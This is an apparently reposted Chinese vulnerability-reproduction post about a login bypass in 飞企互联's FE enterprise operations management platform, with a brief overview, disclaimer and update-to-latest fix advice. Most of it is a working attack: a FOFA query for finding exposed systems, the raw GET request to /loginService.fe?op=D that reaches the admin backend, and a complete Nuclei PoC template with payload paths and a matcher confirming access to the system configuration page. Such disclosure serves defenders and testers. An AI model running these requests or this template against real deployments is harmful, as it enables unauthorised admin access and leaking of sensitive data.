【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

admin 2024年1月6日10:01:25评论111 views字数 1184阅读3分56秒阅读模式

免责声明


【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过


此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时私信我们

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

漏洞概述

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

飞企互联-FE企业运营管理平台多处接口处存在登录绕过,未授权的攻击者可构造恶意的url访问页面,可直接进入后台管理页面,获取敏感信息。

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

FoFa

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

app="飞企互联-FE企业运营管理平台"

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

漏洞复现

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

GET /loginService.fe?op=D HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

Nuclei Poc

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

id: fe-enterprise-bypass-login-configinfo:  name: 飞企互联-FE企业运营管理平台-登录绕过  author: rain  severity: critical  metadata:    fofa-query: app="飞企互联-FE企业运营管理平台"
requests: - raw: - | GET /{{path}} HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 - | GET /main/main.jsp HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Geck cookie-reuse: true attack: batteringram payloads: path: - /2.ln?SYS_LINK=77507068764957484a5067777862714f457a66574871642f4330574c76717868394a35496d37416c497951724f33446f51486375685a5a2b31684938472b7056 - /loginService.fe?op=D stop-at-first-match: true
matchers: - type: dsl dsl: - status_code_2 == 200 && contains(body_2,'系统配置')

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

修复建议

【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

更新至最新版本:确保你的系统版本处于最新状态。厂商通常会发布包含安全修复的更新,及时应用这些更新以确保系统的安全性。

原文始发于微信公众号(知黑守白):【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月6日10:01:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】飞企互联-FE企业运营管理平台-登录绕过http://cn-sec.com/archives/2366114.html

发表评论

匿名网友 填写信息